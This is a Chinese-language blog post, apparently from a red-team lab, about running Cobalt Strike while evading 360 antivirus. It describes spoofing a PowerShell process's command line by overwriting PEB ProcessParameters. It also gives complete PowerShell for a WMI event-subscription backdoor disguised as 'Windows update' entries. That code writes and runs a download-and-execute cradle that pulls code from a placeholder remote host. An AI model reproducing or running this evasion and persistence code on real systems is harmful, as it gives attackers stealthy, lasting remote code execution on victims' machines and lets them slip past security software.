cs上线-自定义powershell参数污染-bypass杀软

2022-01-20 16:10:51 浏览数 (1)

目录:

一:原理

二:实验步骤

三:免杀效果

四:实验步骤

作者:an1m0re7@深蓝攻防实验室

1:原理

PEB结构中ProcessParameters是命令行参数,通过在内存中获取到ProcessParameters的地址,进行覆盖,替换参数。peb结构:https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb

2:实验步骤

1、首先创建一个powershell进程,参数为任意(不被360查杀),此处我未加参数。

2、获取到peb地址。

3、获取到peb结构中ProcessParameters地址,使用wpm函数进行替换。

3:免杀效果

查看进程参数发现显示的还是powershell.exe 没有参数。

4:持久化

可以配合wmi订阅事件后门做持久化。可以bypass 360

代码语言:javascript复制
$TimerArgs = @{
IntervalBetweenEvents = ([UInt32] 2000) # 30 min
SkipIfPassed = $False
TimerId ="Trigger" };
$Timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments $TimerArgs;
$EventFilterArgs = @{
EventNamespace = 'root/cimv2'
Name = "Windows update trigger"
Query = "SELECT * FROM __TimerEvent WHERE TimerID = 'Trigger'"
QueryLanguage = 'WQL' };
$Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs;
write-output 'Invoke-Expression(New-Object System.Net.WebClient).DownloadString("http://xxxxxxx/a")' |out-file -filepath 'c:xxx.ps1'
$FinalPayload = 'c:agu.exe http://xxxxxxxx/a'

$CommandLineConsumerArgs = @{
Name = "Windows update consumer"
CommandLineTemplate = $FinalPayload
};
$Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs;
$FilterToConsumerArgs = @{
Filter = $Filter
Consumer = $Consumer
};
$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs;

可以配合wmi订阅事件后门做持久化。可以bypass 360

powershell

0 人点赞